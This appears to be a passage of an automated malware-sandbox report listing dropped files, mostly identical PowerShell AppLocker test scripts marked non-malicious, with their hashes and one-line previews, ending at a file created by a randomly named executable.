
                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1i1eh1d.sou.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q21kdwxm.rjj.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgjqnzbr.px4.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkjva5we.2bl.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqsb3iln.dnt.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwhyirva.4bb.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s52gr24y.cvc.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sl5rr55s.cvv.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spmaseym.h1v.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqtie05t.j3b.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfgp1gqa.ob5.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tk5zri4w.2ke.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trmxlbhu.444.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ts3vo4pz.lzm.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umi1pw2i.eps.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v20djp2n.cuc.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwouae5s.g53.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1v21z03.dsa.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wh5u3psp.nle.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4q1goqv.tif.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xilu4gnh.tpd.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpnkjtkd.sbb.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xx5nq4ry.fmd.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yke54s30.lyg.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuahofhl.rhq.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw5stfzo.d40.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0bj0go2.lf1.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zapvcw5o.jcd.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zf3su3ut.v44.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\gpnK4per5Z

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
